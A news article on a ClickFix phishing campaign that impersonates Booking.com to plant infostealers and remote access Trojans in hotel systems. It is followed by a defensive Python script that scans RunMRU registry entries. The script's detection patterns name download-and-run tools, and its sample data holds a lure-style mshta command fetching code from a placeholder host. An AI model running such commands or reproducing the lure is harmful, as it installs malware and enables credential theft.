- Microsoft warns about a new phishing campaign that impersonates Booking.com
- It is aimed at companies in the hospitality industry
- The objective is to deploy infostealers and Trojans
Hotels, resorts and other companies in the hospitality industry are being attacked with a sophisticated ClickFix phishing campaign that impersonates Booking.com.
A new Microsoft Intelligence report states that the phishing campaign is “in rapid evolution” and targets companies around the world.
The objective of the campaign is to steal people's payment and personal data, which could lead to electronic fraud and reputational damage for victim organizations.
Storm-1865
First, the attackers create a fake Booking.com notification email, discussing things like guest reviews or accounts. Companies that do not detect the scam are redirected to a fake CAPTCHA puzzle, and if they solve it, they are shown an error message. That fake error message also comes with a "solution", which involves copying a command and pasting it into the Windows Run program to execute it.
Instead of solving the problem, running the command downloads one of the multiple malware strains used in this campaign: XWorm, Lumma Stealer or VenomRAT. These are different types of malware with different characteristics.
While VenomRAT, for example, is a remote access Trojan that gives attackers access to the victim's device, Lumma is an infostealer that takes login credentials and other secrets stored in the web browser and in other parts of the device.
Microsoft attributed the campaign to a threat actor it tracks as Storm-1865, a group with no prior record. Apparently, the campaign began in December 2024, and there is no information about how many companies, if any, fell for it.
ClickFix fraud has become more popular lately, and TechRadar Pro has reported on it on numerous occasions this year. It is an evolution of the old “IT technician” scam, in which a victim receives a pop-up window that impersonates a reputable company and claims that their computer is broken or infected.
The pop-up window shares a phone number that the victim can call to talk to an IT technician and solve the problem. The “technician” ends up installing malware.
While telephone scams are still very much alive, the ClickFix campaign relies mainly on the victim doing most of the work, installing malware through a less obvious process (pasting a command and executing it).
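Because the victim pastes the command into the Windows Run dialog, the text is recorded in the user's RunMRU registry values (`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`), which gives defenders a place to look after a suspected click. The following triage sketch is an added example, not taken from Microsoft's report or the original article; the scoring heuristics, threshold and sample values are assumptions constructed for illustration.

```python
import re

# Heuristic signals (assumptions for illustration, not Microsoft's detections).
SIGNALS = {
    "script_host": re.compile(
        r"\b(mshta|powershell|pwsh|cmd|wscript|cscript|curl|bitsadmin|certutil)(\.exe)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_or_hidden": re.compile(
        r"\s-(e|ec|enc|encodedcommand|w\s+hidden|windowstyle\s+hidden|nop|noprofile)\b", re.I),
    "download_exec": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    # Fake "verification" text is often appended so the pasted line looks harmless.
    "lure_text": re.compile(r"(captcha|not a robot|verif)", re.I),
}

def score_entry(data):
    """Strip the trailing '\\1' that RunMRU appends, then list the signals that match."""
    cmd = data[:-2] if data.endswith("\\1") else data
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(cmd))
    return cmd, hits

def triage_runmru(values, threshold=2):
    """Return (value_name, command, signals) for entries matching >= threshold signals."""
    findings = []
    for name, data in values.items():
        if name.lower() == "mrulist":  # ordering metadata, not a command
            continue
        cmd, hits = score_entry(data)
        if len(hits) >= threshold:
            findings.append((name, cmd, hits))
    return findings

# Constructed sample of RunMRU values (name -> data); the domain is a placeholder.
SAMPLE = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\reservations\\1",
    "c": "mshta https://verify.example.invalid/check # I am not a robot - reCAPTCHA ID: 0000\\1",
}

if __name__ == "__main__":
    for name, cmd, hits in triage_runmru(SAMPLE):
        print(f"[suspicious] RunMRU\\{name}: {cmd!r} signals={hits}")
```

On a live Windows host the same dictionary can be built with the standard `winreg` module; a single signal such as a bare `cmd` is deliberately not flagged, since administrators use the Run dialog legitimately.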